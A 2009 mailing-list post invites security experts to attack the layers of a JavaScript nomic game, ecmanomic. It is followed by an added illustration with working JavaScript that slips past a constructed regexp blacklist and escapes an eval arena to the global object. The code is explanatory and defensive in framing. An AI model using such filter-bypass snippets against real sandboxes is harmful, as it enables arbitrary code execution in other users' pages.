[OT] A game that may interest javascript security buffs


abliss

Jun 30, 2009, 10:40:19 PM6/30/09
to Google Caja Discuss, ecma...@googlegroups.com
Hi all,

I apologize for being a little off-topic, since this isn't directly caja-related, but I didn't know where else to look for the world's greatest javascript security experts.

I've hacked together a little javascript game called "ecmanomic" (played in the browser at http://ecmanomic.org ). I think it may interest some of you and I'm eager to hear your feedback on it. Ecmanomic is inspired by Peter Suber's game of Nomic, where each play of the game changes the rules of the game. There's a google group (cc'd) and a google code project as well, both called "ecmanomic".

(This was a learning project for me since I didn't know anything about javascript at the beginning. So please excuse the terrible style and all the egregious mistakes I've no doubt made.)

Suber's Nomic was designed to model the legislative process, where there are layers of "security" that enforce a kind of self-paternalism. Similarly, in ecmanomic there are several layers of security that I've tried to implement in (almost) pure javascript. I'd like to know if any of you see a way to violate any of these layers.

1. The entire game is stored in a javascript object, serialized in a slightly-modified JSON. The game allows players to change the game object, but only in specific ways: e.g. proposing an amendment, voting on existing amendments, and activating an amendment with sufficient positive votes. Can you use these basic interactions to pervert the game object itself (for example, changing your player's score to 100)? (I'll give you 100 metaphorical points if you can.)

2. The game also has a small hosted database. I added this at the last minute so that it can maintain libraries of code which aren't part of the game proper (and thus don't slow down the page load). The database is stored in JSON flat files on a linux filesystem. The small bootstrap perl-script which is responsible for running the server-side JS also provides the game access to the files. However, the bootstrap script has no security; I've attempted to layer on some security from within the javascript game. Can you subvert this security to gain unfettered read or write access to the database? (25 points for read, 50 points for write. If you could write, you could execute arbitrary code in the player's browser, but not in the server-side game; however this would be enough for dastardly deeds.)

3. Within the game of ecmanomic I've implemented a few little subgames. All of these involve eval() statements, as a test of how robust I could make the security. In the first game, CodeWriter, you submit a snippet of code which must evaluate to a function. Before evaluating your code, I pass it through some regexps looking for unsafe patterns. If your code is OK, your function enters the game arena and competes against other functions. Can you subvert this game and force yourself to win? (1 point if you can. Also 1 point each round you can come up with the cleverest function!)

4. Another subgame, much more ambitious, is called "Moo". In this game I allow persistence of user-created data and code, including a bastardized version of prototypical inheritance, and I allow users to interact with each others' objects and functions. The objects have "owner" fields that should restrict write-access. 1 point for you if you can change someone else's object without their permission. Also, to prevent DOS-style bloat attacks, each user has a limited budget of bytes to add to the game; the budget can only be refilled by another player who is impressed by your work. Half a point for anyone who can find a way to circumvent this, but please don't demonstrate by filling the game up with spam!

5. Within the Moo subgame, there's yet another layer of security. I tried to create an in-subgame non-scarce currency called "props". The idea is that I can "depute" certain objects by name; these objects are authorized to give props on my behalf. There's an example in the Avatar lobby: a graffiti wall which will give you one props from me if you write on it. 0.5 points if you can violate this currency model, e.g. get more than 1 props from me or remove someone else's props.

Anyway, if you feel inclined to take a look at the game in your copious free time, I'd love to hear what you think of it, either here or on the ecmanomic newsgroup. All criticism will be graciously accepted! (I already know that the user interface is not very good, but one beauty of the game is that any player can improve the interface for everyone, so feel free to jump in and help out!)

Cheers,
--Adam
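An added illustration of the question layer 3 raises (regexps over eval()'d source as a filter), not code from ecmanomic or from the author; the post does not show CodeWriter's actual patterns, so the blacklist, the `admit` arena stub and the submitted snippets below are all constructed for the demonstration. It shows two general properties of JavaScript that any regexp-on-source filter has to contend with: property names can be assembled at runtime, so a forbidden identifier never has to appear as a token, and a plain call of a sloppy-mode function binds `this` to the global object with no forbidden word at all.

```javascript
// Constructed blacklist standing in for a naive "unsafe patterns" filter.
// Everything here is an assumption for the demo, not ecmanomic's real regexps.
const UNSAFE = /\b(eval|Function|constructor|__proto__|window|document|globalThis|process|require)\b/;

function passesFilter(src) {
  return !UNSAFE.test(src);
}

// Stub of a "must evaluate to a function" arena: reject on the blacklist,
// evaluate, and keep the result only if it is a function. Indirect eval runs
// the snippet as global code; its strictness comes from the snippet itself.
function admit(src) {
  if (!passesFilter(src)) return null;
  const value = (0, eval)("(" + src + ")");
  return typeof value === "function" ? value : null;
}

// Submitted snippet 1: the Function constructor reached from an array literal
// via a property name spelled by concatenation, so no blacklisted token appears.
const payloadConstructorChain = `function () {
  var c = "con" + "structor";
  return [][c][c]("return this")();
}`;

// Submitted snippet 2: no suspicious word at all. In sloppy mode a bare call of
// a function expression binds "this" to the global object.
const payloadSloppyThis = `function () {
  return (function () { return this; })();
}`;

// A benign competitor, and the obvious spelling the regexp does catch.
const payloadBenign = `function (a, b) { return a + b; }`;
const payloadObvious = `function () { return Function("return this")(); }`;

// The filter only ever sees source text; the escape happens when the admitted
// function is later called inside the arena.
function escapes(fn) {
  return fn !== null && fn() === globalThis;
}

function demo() {
  return {
    benignAdmitted: admit(payloadBenign) !== null,
    obviousBlocked: admit(payloadObvious) === null,
    chainPassesFilter: passesFilter(payloadConstructorChain),
    chainEscapes: escapes(admit(payloadConstructorChain)),
    thisPassesFilter: passesFilter(payloadSloppyThis),
    thisEscapes: escapes(admit(payloadSloppyThis)),
  };
}

module.exports = { passesFilter, admit, escapes, demo };
```

Once a submitted function holds the global object it can reach anything the page can, including the game object and the hosted-database client, so filtering source text with regexps is a blacklist with an open-ended bypass surface rather than a boundary. The approach Caja itself takes is the opposite one: parse the submitted code, admit only a verified safe subset, and rewrite it so that it cannot obtain the global object in the first place.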
